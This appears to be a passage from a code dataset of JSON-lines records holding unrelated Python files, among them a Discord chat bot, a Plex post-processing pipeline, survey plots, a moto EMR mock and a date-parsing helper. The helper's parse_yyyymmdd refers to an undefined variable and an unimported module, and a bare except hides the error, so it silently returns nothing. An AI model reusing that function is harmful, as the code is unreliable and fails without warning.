networks.insert_one(network)\n","repo_name":"nslobodchuk/twitter-data","sub_path":"build_network.py","file_name":"build_network.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43632296550","text":"from django import template\n\nfrom notifications.models import NotificationModel\n\nregister = template.Library()\n\n\n@register.inclusion_tag('notifications/notification_bar.html')\ndef notification_bar(user, notification_url=None):\n\t\"\"\"\n\tTemplate Tag to 
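build_network.py above computes network_size recursively, issuing one find() per node and one Python stack frame per tree level, which risks both repeated round-trips and the recursion limit on deep reply chains. An iterative version of the same descendant count, assuming the identical nodes schema with _id and children fields:

def network_size_iter(nodes, root_id):
    # Depth-first with an explicit stack: same count, no recursion limit.
    total = 0
    stack = [root_id]
    while stack:
        node = nodes.find_one({'_id': stack.pop()})
        if node is None:
            continue
        children = node.get('children') or []
        total += len(children)
        stack.extend(children)
    return total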
produce a notification bar for the provided user.\n\t\"\"\"\n\tnotifications = NotificationModel.objects.filter(user=user, unread=True)\n\t\n\tcontext = {\n\t\t'notification_count': len(notifications),\n\t\t'notification_url': notification_url,\n\t}\n\treturn context\n\n","repo_name":"ortegagingrich/inventory-app","sub_path":"django_project/notifications/templatetags/notification_bar.py","file_name":"notification_bar.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74058664515","text":"from discord.commands import slash_command\nfrom discord.ext import commands\nfrom discord.commands import Option\n\nimport aiosqlite as sqlite3\nfrom asyncio import sleep\nimport discord\nfrom datetime import datetime\nimport json\n\nclass MainCog(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n # add help embed later\n @slash_command(description=\"Wie man diesen Bot nutzen tut.\", name=\"help\")\n async def help(self, ctx):\n await ctx.respond(\"Ja.\")\n\n @slash_command(description=\"Erstelle den GlobalChat-Channel auf diesem Server\", name=\"install\")\n async def install(self, ctx, recreate: Option(str, \"Falls vorhanden, wird der alte Kanal aus der Datenbank gelöscht und ein neuer erstellt.\", choices=[\"An\"], required=False)):\n if not ctx.author.guild_permissions.manage_channels:\n embed = discord.Embed(title=\"Fehler\", color=discord.Color(0xFF431F), description=\"Du benötigst die Berechtigung, Kanäle zu verwalten.\")\n await ctx.respond(embed=embed, ephemeral=True)\n return\n async with sqlite3.connect(\"database.db\") as db:\n\n async with db.execute(\"SELECT * FROM serverdata WHERE guild = ?\", (ctx.guild.id,)) as c:\n fetch_guild = await c.fetchone()\n if recreate == \"An\":\n pass\n else:\n if fetch_guild is not None:\n embed = discord.Embed(title=\"Hinweis\", color=discord.Color(0xFF9531), description=\"Es befindet sich bereits ein Channel in der Datenbank. 
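One detail in the notification_bar tag above: len(notifications) materializes the whole queryset just to count it. When only the number is needed, QuerySet.count() asks the database for COUNT(*) instead (a sketch of the tag with that single change, same imports as the source):

from django import template
from notifications.models import NotificationModel

register = template.Library()

@register.inclusion_tag('notifications/notification_bar.html')
def notification_bar(user, notification_url=None):
    # COUNT(*) in SQL instead of fetching every unread notification row.
    unread = NotificationModel.objects.filter(user=user, unread=True)
    return {
        'notification_count': unread.count(),
        'notification_url': notification_url,
    }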
Bitte nutze die Option `recreate`, um den Channel neu zu erstellen und den alten aus meiner Datenbank zu entfernen.\")\n await ctx.respond(embed=embed)\n return\n \n category = ctx.channel.category\n created_channel = await ctx.guild.create_text_channel(name=\"🌍-globalchat\", category=category)\n \n # add the channel to the database\n \n await db.execute(\"INSERT OR REPLACE INTO serverdata(guild,channel) VALUES(?,?)\", (ctx.guild.id, created_channel.id))\n await db.commit()\n await ctx.respond(created_channel.mention, ephemeral=True)\n async with created_channel.typing():\n await sleep(2)\n embed = discord.Embed(color=0xB1FF1F, title=\"Willkommen\", description=f\"Ich freue mich sehr, dass **`{ctx.guild.name}`** nun dem Globalen Chat beigetreten ist.\")\n embed.set_footer(text=\"Sag 'Hallo' zu den anderen!\")\n await created_channel.send(embed=embed)\n await created_channel.edit(position=1, sync_permissions=True, slowmode_delay=3, topic=\"🌍 In diesem Channel kann mit anderen Mitgliedern über Servern hinweg geschrieben werden.\\n**REGELN:**\\n\"+\"\"\"\n \n • Kein Spam\n • Keine Beleidigungen\n • Kein NSFW\n • Keine Werbung\n\n-> Hinweis an Moderatoren: Bitte lasst den Slowmode bei mindestens 3 Sekunden, um eine Überlastung des Bots zu vermeiden.\n \n \"\"\")\n @slash_command(description=\"Bannt einen User von dem Globalen Chat\", name=\"ban\")\n async def ban(self, ctx, user: Option(discord.Member, \"Welcher Nutzer gebannt werden soll.\"), reason: Option(str, \"Der Grund für den Ban\", default=\"Kein Grund angegeben\", required=False)):\n # create a function later for fetching moderators\n with open(\"config.json\") as f:\n try:\n config: dict = json.load(f)\n mods: list = config[\"moderators\"]\n except KeyError:\n mods: list = []\n if not ctx.author.id in mods:\n embed = discord.Embed(title=\"Fehler\", color=discord.Color(0xFF431F), description=\"Du bist kein Bot-Moderator. 
Es ist nötig, Bot-Moderator zu sein, um Benutzer im GlobalChat zu bannen.\")\n            await ctx.respond(embed=embed, ephemeral=True)\n            return\n        \n        async with sqlite3.connect(\"database.db\") as db:\n\n            async with db.execute(\"SELECT user FROM bans WHERE user = ?\", (user.id,)) as c:\n                fetch_user = await c.fetchone()\n            if not fetch_user:\n                fetch_user = (0,)\n            if user.id in fetch_user:\n                embed = discord.Embed(title=\"Fehler\", color=discord.Color(0xFF431F), description=\"Dieser Nutzer ist bereits gebannt.\")\n                await ctx.respond(embed=embed, ephemeral=True)\n                return\n\n            embed = discord.Embed(color=discord.Color(0xB1FF1F), title=\"User gebannt\", description=f\"**`Benutzer`** {user.mention}\\n**`Moderator:`** {ctx.author.mention}\\\n                \\n**`Grund:`** {reason}\")\n            await db.execute(\"INSERT INTO bans(user,reason,mod,time) VALUES(?,?,?,?)\", (user.id, reason, ctx.author.id, datetime.utcnow()))\n            await db.commit()\n            await ctx.respond(embed=embed)\ndef setup(bot):\n    bot.add_cog(MainCog(bot))","repo_name":"dxtoan1992/globalchat_DB","sub_path":"cogs/main_cog.py","file_name":"main_cog.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20328519953","text":"#!/opt/local/bin/python3\n# encoding: utf-8\n\nimport os, shutil, subprocess, sys\n\nfrom com.camding.plexpostprocess.PlexPostProcessState import PlexPostProcessState\nfrom com.camding.plexpostprocess.Settings import Settings\nfrom com.camding.plexpostprocess.steps.AddMeta import AddMeta\nfrom com.camding.plexpostprocess.steps.Transcode import Transcode\nfrom com.camding.plexpostprocess.steps.Commskip import Commskip\nfrom com.camding.plexpostprocess.steps.DetermineFilename import DetermineFilename\n\nclass PlexPostProcessStateMachine(object):\n    def __init__(self, databaseInteraction):\n        self.__databaseInteraction = databaseInteraction\n        self.__queue = self.GetDatabaseInteraction().GetQueue();\n\n    def GetQueue(self):\n        return self.__queue\n\n    def GetDatabaseInteraction(self):\n        return self.__databaseInteraction;\n\n    def PlexPostProcess(self):\n        queue = self.GetQueue()\n        print('I have ' + str(len(queue)) + ' files to handle!')\n        for i in range(0, len(queue)):\n            queuedFile = queue[i]\n            while not queuedFile.IsFinished():\n                self.ProcessQueuedFile(i, queuedFile)\n\n    def ProcessQueuedFile(self, i, queuedFile):\n        print('  Processing ' + str(i) + queuedFile.GetFilename() + ' in state ' + queuedFile.GetState().name)\n        if queuedFile.GetState() == PlexPostProcessState.INITIAL:\n            if queuedFile.GetFiletype() == 'm4v':\n                if Settings.GetConfig(\"Applications\", \"handbrake\", \"false\").lower() in ['true', '1', 't', 'y', 'yes', 'yeah', 'yup', 'certainly', 'uh-huh', 'on' ]:\n                    queuedFile.SetState(PlexPostProcessState.COMMSKIP)\n                else:\n                    queuedFile.SetState(PlexPostProcessState.TRANSCODING) # Comskip no longer needed\n                self.GetDatabaseInteraction().UpdateQFState(queuedFile, \"Startup\", \"Started commskip\")\n            else:\n                queuedFile.SetState(PlexPostProcessState.TRANSCODING)\n                self.GetDatabaseInteraction().UpdateQFState(queuedFile, \"Comskip\", \"Started processing\")\n        elif queuedFile.GetState() == PlexPostProcessState.COMMSKIP:\n            Commskip(self).Commskip(i, queuedFile)\n        elif queuedFile.GetState() == PlexPostProcessState.TRANSCODING:\n            Transcode(self).Transcode(i, queuedFile)\n        elif queuedFile.GetState() == PlexPostProcessState.ADD_META:\n            AddMeta(self).AddMeta(i, queuedFile)\n        elif queuedFile.GetState() == PlexPostProcessState.MOVING_FILES:\n            self.MoveFiles(i, queuedFile)\n        
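The ban command above carries the comment 'create a function later for fetching moderators' and then inlines the config.json lookup. A hedged sketch of that helper, assuming the same top-level moderators list in config.json:

import json

def get_moderators(path='config.json'):
    # Missing file, bad JSON, or absent key all mean: nobody is a moderator.
    try:
        with open(path) as fh:
            return list(json.load(fh).get('moderators', []))
    except (FileNotFoundError, json.JSONDecodeError):
        return []

# Usage inside the command: if ctx.author.id not in get_moderators(): ...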
elif queuedFile.GetState() == PlexPostProcessState.DELETING_ORIGINAL_FILE:\r\n            self.DeleteOriginalFile(i, queuedFile)\r\n        elif queuedFile.GetState() == PlexPostProcessState.PENDING_DELETE_DUPLICATE:\r\n            self.DeleteDuplicateFile(i, queuedFile)\r\n        else:\r\n            raise Exception(\"Damn, invalid state \" + queuedFile.GetState().name)\r\n\r\n    def RunProcess(self, command, env=None, stdin=None, stdout=None, stderr=None):\r\n        \"\"\" Run command with specified env and I/O handles, return process \"\"\"\r\n\r\n        # merge specified env with OS env\r\n        myenv = os.environ.copy()\r\n        if env is not None:\r\n            myenv.update(env)\r\n\r\n        try:\r\n            process = subprocess.Popen(command, stdin=stdin, stdout=stdout, stderr=stderr, env=myenv, bufsize=0)\r\n            return process\r\n        except:\r\n            print(\"Unexpected error when launching process:\")\r\n            print(\"  \", command)\r\n            print(\"  \", env)\r\n            raise\r\n\r\n    def MoveFiles(self, _i, queuedFile):\r\n        filenameHandler = DetermineFilename(self)\r\n        self.GetDatabaseInteraction().AddQFHistory(queuedFile, \"Move Files\", \"Moving from '\" + filenameHandler.GetTempFilename(queuedFile) + \"' to '\" + filenameHandler.GetDestFilename(queuedFile) + \"'\")\r\n        try:\r\n            shutil.move(filenameHandler.GetTempFilename(queuedFile), filenameHandler.GetDestFilename(queuedFile))\r\n        except Exception as e:\r\n            queuedFile.SetState(PlexPostProcessState.ERROR)\r\n            print(e.__doc__)\r\n            print(str(e))\r\n            self.GetDatabaseInteraction().UpdateQFState(queuedFile, \"Move Files\", \"Error \" + str(sys.exc_info()[0]))\r\n            sys.exit(2)\r\n        if Settings.GetConfig(\"Applications\", \"handbrake\", \"false\").lower() in ['true', '1', 't', 'y', 'yes', 'yeah', 'yup', 'certainly', 'uh-huh', 'on' ]:\r\n            queuedFile.SetState(PlexPostProcessState.DELETING_ORIGINAL_FILE)\r\n        else:\r\n            queuedFile.SetState(PlexPostProcessState.SUCCESS)\r\n        self.GetDatabaseInteraction().UpdateQFState(queuedFile, \"Move Files\", \"Finished moving files with success!\")\r\n\r\n    def DeleteFile(self, deleteType, successState, errorState, _i, queuedFile):\r\n        self.GetDatabaseInteraction().AddQFHistory(queuedFile, deleteType, \"Deleting '\" + queuedFile.GetFilename() + \"'\")\r\n        try:\r\n            os.remove(queuedFile.GetFilename())\r\n        except:\r\n            queuedFile.SetState(errorState)\r\n            self.GetDatabaseInteraction().UpdateQFState(queuedFile, deleteType, \"Error \" + str(sys.exc_info()[0]))\r\n            return;\r\n        queuedFile.SetState(successState)\r\n        self.GetDatabaseInteraction().UpdateQFState(queuedFile, deleteType, \"Finished deleting files with success!\")\r\n\r\n    def DeleteOriginalFile(self, i, queuedFile):\r\n        self.DeleteFile(\"Delete Original\", PlexPostProcessState.SUCCESS, PlexPostProcessState.ERROR, i, queuedFile)\r\n\r\n    def DeleteDuplicateFile(self, i, queuedFile):\r\n        self.DeleteFile(\"Delete Duplicate\", PlexPostProcessState.DUPLICATE_DELETED, PlexPostProcessState.ERROR, i, queuedFile)\r\n","repo_name":"dawesc/PlexPostProcess","sub_path":"com/camding/plexpostprocess/PlexPostProcessStateMachine.py","file_name":"PlexPostProcessStateMachine.py","file_ext":"py","file_size_in_byte":5224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30962087136","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy import stats\nimport seaborn as sns\n\ndef column_mean_plot(df, column, sort=False, limiter=True):\n    # Plot the selected column of the dataframe\n    # limiter is to set the scale for 1-5\n\n    if sort:\n        df = df.sort_values(by=column)\n\n    # Set the color of the bars to orange\n    ax = df.plot(x='img nr', y=column, kind='bar', color='#FF7F0E', width=0.6)\n\n    # Set the axis 
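ProcessQueuedFile above dispatches on the state enum with a long if/elif chain. A dictionary from state to handler keeps that mapping in one place and still rejects unknown states; a generic sketch of the pattern (not the project's actual classes):

class StateMachine:
    def __init__(self):
        # State name -> bound handler; extend as new states are added.
        self.handlers = {'MOVING_FILES': self.move_files}

    def move_files(self, item):
        print('moving', item)

    def process(self, state, item):
        handler = self.handlers.get(state)
        if handler is None:
            raise Exception('invalid state ' + state)
        handler(item)

StateMachine().process('MOVING_FILES', 'file.m4v')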
labels and title\n ax.set_xlabel('Image', fontsize=12)\n ax.set_ylabel(f'{column} Score', fontsize=12)\n if limiter:\n ax.set_ylim([1, 5])\n ax.set_title(f'Mean {column} Scores by Image', fontsize=14)\n\n # Add grid lines to the plot\n plt.grid(axis='y', alpha=0.5)\n\n # Show the plot\n plt.show()\n\ndef getBestImage(df):\n # sums the mean 'realistic, creative, likeness, connection' values\n # the higher the number the better the image in all categories\n \n bestDf = df.copy()\n bestDf['sum'] = bestDf['realistic'] + bestDf['creative'] + bestDf['likeness'] + bestDf['connection']\n\n bestDf = bestDf.sort_values(by='sum')\n column_mean_plot(bestDf, 'sum', sort=True, limiter=False)\n\ndef getGeneratedImages(df):\n # the nongenerated images have the imgnr 991, 992, 993\n\n # Define the non-generated image numbers\n non_gen = [991, 992, 993]\n\n # Filter the DataFrame to include only rows with non-generated image numbers\n newDf = df[~df['img nr'].isin(non_gen)]\n \n # Return the filtered DataFrame\n return newDf\n\ndef getRealImages(df):\n # the nongenerated images have the imgnr 991, 992, 993\n\n # Define the non-generated image numbers\n non_gen = [991, 992, 993]\n\n # Filter the DataFrame \n newDf = df[df['img nr'].isin(non_gen)]\n \n # Return the filtered DataFrame\n return newDf\n\ndef mean_plot(df1, df2=None):\n # Calculate the mean of each column for the first dataframe\n mean_df1 = df1.mean().loc[['realistic', 'creative', 'likeness']]\n\n # Create a numpy array of the mean values for the first dataframe\n values1 = np.array(mean_df1.values)\n\n # Set the x-axis labels for the first dataframe\n labels1 = mean_df1.index\n\n # Create a bar chart with the mean column values for the first dataframe\n plt.bar(labels1, values1, width=0.3, label='Real')\n\n if df2 is not None:\n # Calculate the mean of each column for the second dataframe\n mean_df2 = df2.mean().loc[['realistic', 'creative', 'likeness', 'connection']]\n\n # Create a numpy array of the mean values for the second dataframe\n values2 = np.array(mean_df2.values)\n\n # Set the x-axis labels for the second dataframe\n labels2 = mean_df2.index\n\n # Create a bar chart with the mean column values for the second dataframe\n plt.bar(labels2, values2, width=0.3, label='Generated', align='edge')\n\n # Set the plot title and axis labels\n plt.title('Comparison of Mean Ratings', fontsize=14)\n # plt.xlabel('Categories', fontsize=12)\n plt.ylabel('Mean Value', fontsize=12)\n plt.ylim([1, 5])\n\n # Add a legend to the plot\n plt.legend(fontsize=12)\n\n # Add grid lines to the plot\n plt.grid(axis='y', alpha=0.5)\n\n # Show the plot\n plt.show()\n\n\n\n# Load the CSV file into a dataframe\nresponses = pd.read_csv('responses.csv')\n\n# print(responses)\n\n\n# 999 - real image\n#\n# question\timg nr\n# 1\t 46\n# 2\t 269\n# 3\t 28\n# 4\t 30\n# 5\t 154\n# 6\t 999\n# 7\t 224\n# 8\t 155\n# 9\t 17\n# 10\t 152\n# 11\t 199\n# 12\t 223\n# 13\t 999\n# 14\t 999\n# 15\t 201\n\n# Create a dictionary with column data\ndata = {'question': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15],\n 'img nr': [46, 269, 28, 30, 154, 991, 224, 155, 17, 152, 199, 223, 992, 993, 201],\n # 'aigen':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n 'realistic':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n 'creative':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n 'likeness':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n 'connection':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n # 'comments':[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n }\n\ndf = 
pd.DataFrame(data)\n\n# Loop through the questions 1 to 15\nfor i in range(1,16):\n # Compute the mean value of the 'realistic' column for the current question\n realistic = responses[str(i+0.2)].mean()\n # Assign the mean value to the 'realistic' column of the corresponding row in the dataframe\n df.loc[df['question'] == i, 'realistic'] = realistic\n creative = responses[str(i+0.3)].mean()\n df.loc[df['question'] == i, 'creative'] = creative\n likeness = responses[str(i+0.4)].mean()\n df.loc[df['question'] == i, 'likeness'] = likeness\n connection = responses[str(i+0.5)].mean()\n df.loc[df['question'] == i, 'connection'] = connection\n\n\ndf = df.sort_values(by='img nr')\n\n\ndfGen = getGeneratedImages(df)\ndfReal = getRealImages(df)\n\n# print(dfGen)\n\n# mean_plot(dfReal, dfGen)\n# mean_plot(dfGen)\n\n# column_mean_plot(df, \"realistic\", sort=True)\n# column_mean_plot(df, \"creative\", sort=True)\n# column_mean_plot(df, \"likeness\", sort=True)\n# column_mean_plot(df, \"connection\", sort=True)\n# print(df)\n\ncolumn_mean_plot(dfGen, \"realistic\", sort=False)\n# column_mean_plot(dfGen, \"creative\", sort=False)\n# column_mean_plot(dfGen, \"likeness\", sort=False)\n# column_mean_plot(dfGen, \"connection\", sort=False)\n\n\n\n# getBestImage(df)\n\n\n\n\n\n\n","repo_name":"pawelsznura/Swimwear-Designer","sub_path":"survey/surveydata.py","file_name":"surveydata.py","file_ext":"py","file_size_in_byte":5467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29026373895","text":"from moto.core import BaseBackend\n\nfrom .utils import random_job_id, random_instance_group_id\n\nDEFAULT_JOB_FLOW_ROLE = 'EMRJobflowDefault'\n\n\nclass FakeInstanceGroup(object):\n def __init__(self, id, instance_count, instance_role, instance_type, market, name, bid_price=None):\n self.id = id\n self.num_instances = instance_count\n self.role = instance_role\n self.type = instance_type\n self.market = market\n self.name = name\n self.bid_price = bid_price\n\n def set_instance_count(self, instance_count):\n self.num_instances = instance_count\n\n\nclass FakeStep(object):\n def __init__(self, state, **kwargs):\n # 'Steps.member.1.HadoopJarStep.Jar': ['/home/hadoop/contrib/streaming/hadoop-streaming.jar'],\n # 'Steps.member.1.HadoopJarStep.Args.member.1': ['-mapper'],\n # 'Steps.member.1.HadoopJarStep.Args.member.2': ['s3n://elasticmapreduce/samples/wordcount/wordSplitter.py'],\n # 'Steps.member.1.HadoopJarStep.Args.member.3': ['-reducer'],\n # 'Steps.member.1.HadoopJarStep.Args.member.4': ['aggregate'],\n # 'Steps.member.1.HadoopJarStep.Args.member.5': ['-input'],\n # 'Steps.member.1.HadoopJarStep.Args.member.6': ['s3n://elasticmapreduce/samples/wordcount/input'],\n # 'Steps.member.1.HadoopJarStep.Args.member.7': ['-output'],\n # 'Steps.member.1.HadoopJarStep.Args.member.8': ['s3n:///output/wordcount_output'],\n # 'Steps.member.1.ActionOnFailure': ['TERMINATE_JOB_FLOW'],\n # 'Steps.member.1.Name': ['My wordcount example']}\n\n self.action_on_failure = kwargs['action_on_failure']\n self.name = kwargs['name']\n self.jar = kwargs['hadoop_jar_step._jar']\n self.args = []\n self.state = state\n\n arg_index = 1\n while True:\n arg = kwargs.get('hadoop_jar_step._args.member.{0}'.format(arg_index))\n if arg:\n self.args.append(arg)\n arg_index += 1\n else:\n break\n\n\nclass FakeJobFlow(object):\n def __init__(self, job_id, name, log_uri, job_flow_role, visible_to_all_users, steps, instance_attrs):\n self.id = job_id\n self.name = name\n self.log_uri = log_uri\n 
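The loop above builds column names with str(i+0.2), leaning on Python's shortest-repr float printing to produce headers like '1.2'. That happens to work, but integer-based f-strings say the same thing without float arithmetic (a sketch over the same '<question>.<field>' header scheme):

import pandas as pd

FIELD_OFFSETS = {'realistic': 2, 'creative': 3, 'likeness': 4, 'connection': 5}

def question_means(responses: pd.DataFrame, question: int) -> dict:
    # Column '7.2' is question 7's 'realistic' rating, and so on.
    return {field: responses[f'{question}.{offset}'].mean()
            for field, offset in FIELD_OFFSETS.items()}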
self.role = job_flow_role or DEFAULT_JOB_FLOW_ROLE\n self.state = \"STARTING\"\n self.steps = []\n self.add_steps(steps)\n\n self.initial_instance_count = instance_attrs.get('instance_count', 0)\n self.initial_master_instance_type = instance_attrs.get('master_instance_type')\n self.initial_slave_instance_type = instance_attrs.get('slave_instance_type')\n\n self.set_visibility(visible_to_all_users)\n self.normalized_instance_hours = 0\n self.ec2_key_name = instance_attrs.get('ec2_key_name')\n self.availability_zone = instance_attrs.get('placement.availability_zone')\n self.keep_job_flow_alive_when_no_steps = instance_attrs.get('keep_job_flow_alive_when_no_steps')\n self.termination_protected = instance_attrs.get('termination_protected')\n\n self.instance_group_ids = []\n\n def terminate(self):\n self.state = 'TERMINATED'\n\n def set_visibility(self, visibility):\n if visibility == 'true':\n self.visible_to_all_users = True\n else:\n self.visible_to_all_users = False\n\n def add_steps(self, steps):\n for index, step in enumerate(steps):\n if self.steps:\n # If we already have other steps, this one is pending\n self.steps.append(FakeStep(state='PENDING', **step))\n else:\n self.steps.append(FakeStep(state='STARTING', **step))\n\n def add_instance_group(self, instance_group_id):\n self.instance_group_ids.append(instance_group_id)\n\n @property\n def instance_groups(self):\n return emr_backend.get_instance_groups(self.instance_group_ids)\n\n @property\n def master_instance_type(self):\n groups = self.instance_groups\n if groups:\n return groups[0].type\n else:\n return self.initial_master_instance_type\n\n @property\n def slave_instance_type(self):\n groups = self.instance_groups\n if groups:\n return groups[0].type\n else:\n return self.initial_slave_instance_type\n\n @property\n def instance_count(self):\n groups = self.instance_groups\n if not groups:\n # No groups,return initial instance count\n return self.initial_instance_count\n count = 0\n for group in groups:\n count += int(group.num_instances)\n return count\n\n\nclass ElasticMapReduceBackend(BaseBackend):\n\n def __init__(self):\n self.job_flows = {}\n self.instance_groups = {}\n\n def run_job_flow(self, name, log_uri, job_flow_role, visible_to_all_users, steps, instance_attrs):\n job_id = random_job_id()\n job_flow = FakeJobFlow(job_id, name, log_uri, job_flow_role, visible_to_all_users, steps, instance_attrs)\n self.job_flows[job_id] = job_flow\n return job_flow\n\n def add_job_flow_steps(self, job_flow_id, steps):\n job_flow = self.job_flows[job_flow_id]\n job_flow.add_steps(steps)\n return job_flow\n\n def describe_job_flows(self):\n return self.job_flows.values()\n\n def terminate_job_flows(self, job_ids):\n flows = [flow for flow in self.describe_job_flows() if flow.id in job_ids]\n for flow in flows:\n flow.terminate()\n return flows\n\n def get_instance_groups(self, instance_group_ids):\n return [\n group for group_id, group\n in self.instance_groups.items()\n if group_id in instance_group_ids\n ]\n\n def add_instance_groups(self, job_flow_id, instance_groups):\n job_flow = self.job_flows[job_flow_id]\n result_groups = []\n for instance_group in instance_groups:\n instance_group_id = random_instance_group_id()\n group = FakeInstanceGroup(instance_group_id, **instance_group)\n self.instance_groups[instance_group_id] = group\n job_flow.add_instance_group(instance_group_id)\n result_groups.append(group)\n return result_groups\n\n def modify_instance_groups(self, instance_groups):\n result_groups = []\n for instance_group in 
instance_groups:\n group = self.instance_groups[instance_group['instance_group_id']]\n group.set_instance_count(instance_group['instance_count'])\n return result_groups\n\n def set_visible_to_all_users(self, job_ids, visible_to_all_users):\n for job_id in job_ids:\n job = self.job_flows[job_id]\n job.set_visibility(visible_to_all_users)\n\n\nemr_backend = ElasticMapReduceBackend()\n","repo_name":"luckyjd/lms_edx","sub_path":"edx-ficus.3-3/apps/edx/venvs/edxapp/lib/python2.7/site-packages/moto/emr/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6800,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"20568613086","text":"'''Er worden via het toetsenbord 10 getallen ingelezen.\nSchrijf een programma dat de positieve getallen toevoegt in een list met de naam positieve_getallen en de strikt negatieve getallen toevoegt in een list met de naam negatieve_getallen.\n\nDruk de lengte en de waarden van beide lists af.\nBepaal het kleinste getal van de list negatieve_getallen.'''\n\n\ndef main():\n positieve_getallen = []\n negatieve_getallen = []\n kleinste_getal = 1 # een positief getal is genoeg omdat de kleinste getal al negatief is\n\n for i in range(10):\n getal = int(input(\"Geef een getal in \"))\n if getal < 0:\n negatieve_getallen.append(getal)\n if getal < kleinste_getal:\n kleinste_getal = getal\n\n else:\n positieve_getallen.append(getal)\n\n print(\"{} positieve getallen in de lijst: {}\".format(len(positieve_getallen), positieve_getallen))\n print(\"{} negatieve getallen in de lijst: {}\".format(len(negatieve_getallen), negatieve_getallen))\n print(\"Het kleinste getal van de list negatieve_getallen is {}\".format(kleinste_getal))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SemihAltintasPXL/PXLToegepast-Informatica","sub_path":"Vakken_eerste_jaar/IT-Essentials/IT-Essentials-oefeningen/7_lists/Oefeningen/oef_7.3.py","file_name":"oef_7.3.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"nl","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"20934428945","text":"from django.db import models\r\nfrom django.contrib.auth.models import User\r\n\r\n# Create your models here.\r\nclass Task(models.Model):\r\n name=models.CharField(max_length=100)\r\n created=models.DateTimeField(auto_now_add=True)\r\n updated=models.DateTimeField(auto_now=True)\r\n description=models.TextField(null=True, blank=True)\r\n complete=models.BooleanField()\r\n host=models.ForeignKey(User,on_delete=models.SET_NULL,null=True)\r\n\r\n class Meta:\r\n ordering = ['-updated','-created']\r\n\r\n def __str__(self):\r\n return self.name","repo_name":"ombharat6361/J021-M2","sub_path":"Q1/J021 M2/dailytask/question1/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41931557500","text":"# This file can check whether MPC weight matrix Q is a positive matrix or not\n#\n# Author: Yinuo Wang\n# Date: 03/19/21\n# Email: dbdxwyn@163.com\nimport numpy as np\n\nr = 4e-5\nq = np.array([1, 1, 1, 0, 0, 50, 0, 0, 1, 1, 1, 1])\nQ = np.zeros((12,12))\nR = np.zeros((12,12))\nfor i in range(12):\n Q[i][i] = q[i]\n R[i][i] = r\n# print(Q)\nfor i in range(12):\n Q_new = Q[0:(i+1),0:(i+1)]\n R_new = R[0:(i+1),0:(i+1)]\n x = np.linalg.det(Q_new)\n y = np.linalg.det(R_new)\n # print(Q_new)\n if x >= 0 and y >= 0:\n print(i,\" OK \",x,y,\"\\n\")\n else:\n print(i,\" Error 
\",x,y,\"\\n\")\n\n\n","repo_name":"allenwang-git/MiLAB-Cheetah-Software","sub_path":"debug_tools/positive_matrix_check.py","file_name":"positive_matrix_check.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"61"} +{"seq_id":"34365851734","text":"from dateutil.parser import parse\n\n\ndef parse_yyyymmdd(date):\n \"\"\"\n Get year, month and day from date format which MM and DD can be 00\n \"\"\"\n year, month, day = None, None, None\n try:\n _year = int(YYYYMMDD[:4])\n d = datetime(_year, 1, 1)\n year = _year\n\n _month = int(YYYYMMDD[4:6])\n d = datetime(year, _month, 1)\n month = _month\n\n _day = int(YYYYMMDD[6:])\n d = datetime(year, month, _day)\n day = _day\n\n except:\n pass\n\n return year, month, day\n\n\ndef parse_months_names(months_names):\n flexible_date = {}\n if months_names:\n months = months_names.split(\"/\")\n flexible_date[\"initial_month_name\"] = months[0]\n flexible_date[\"final_month_name\"] = (\n months[-1] if months[-1] != months[0] else None\n )\n\n return flexible_date\n\n\ndef get_year_from_textual_date(date):\n \"\"\"\n Get year from non standard textual date\n \"\"\"\n # usa parse, mas só considera o ano pois não há garantia de que\n # reconheceu corretamente mês e dia, e o ano é o que mais interessa\n non_alpha = \"\".join([c for c in date if not c.isalpha()])\n for text in (date, non_alpha):\n try:\n parsed = parse(text)\n if str(parsed.year) in date:\n # na ausencia de ano, parse retorna o ano atual\n return parsed.year\n except:\n pass\n\n\ndef parse_non_standard_date(date):\n \"\"\"\n Parse \"incomplete\" date which format is YYYYMMDD, and MM and DD can be 00,\n or textual date\n \"\"\"\n if not date:\n return {}\n flexible_date = {}\n flexible_date[\"date_text\"] = date\n\n if date.isdigit():\n year, month, day = parse_yyyymmdd(date)\n flexible_date[\"year\"] = year\n flexible_date[\"month_number\"] = month\n flexible_date[\"day\"] = day\n else:\n flexible_date[\"year\"] = get_year_from_textual_date(date)\n return flexible_date\n","repo_name":"scieloorg/scms-upload","sub_path":"core/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"2992327939","text":"\"\"\"Initial tables\n\nRevision ID: 4273ebef85cc\nRevises:\nCreate Date: 